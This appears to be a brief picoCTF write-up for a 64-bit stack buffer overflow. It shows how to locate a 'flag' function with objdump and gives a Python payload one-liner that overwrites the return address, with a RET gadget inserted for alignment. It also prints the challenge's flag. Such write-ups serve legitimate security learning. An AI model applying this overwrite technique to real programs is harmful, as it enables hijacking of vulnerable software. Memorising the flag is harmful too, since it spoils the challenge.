Lets try moving to 64-bit, but don't worry we'll start easy. Overflow the buffer and change the return address to the flag function in this program.
Get the address of the flag
function:
$ objdump -d vuln| grep flag
0000000000400767 <flag>:
Overflow the buffer with 64 bytes + 8 bytes RBP
to write the address of flag
in the RIP
. Since the program crashes before any output, I added the address of a RET
gadget before the flag
address and it successfully prints the flag out on the shell server.
$ python2 -c "print('A'*72+'\xde\x05\x40'+'\x00'*5 + '\x67\x07\x40'+'\x00'*5)" | ./vuln
flag: picoCTF{th4t_w4snt_t00_d1ff3r3nt_r1ghT?_72d3e39f}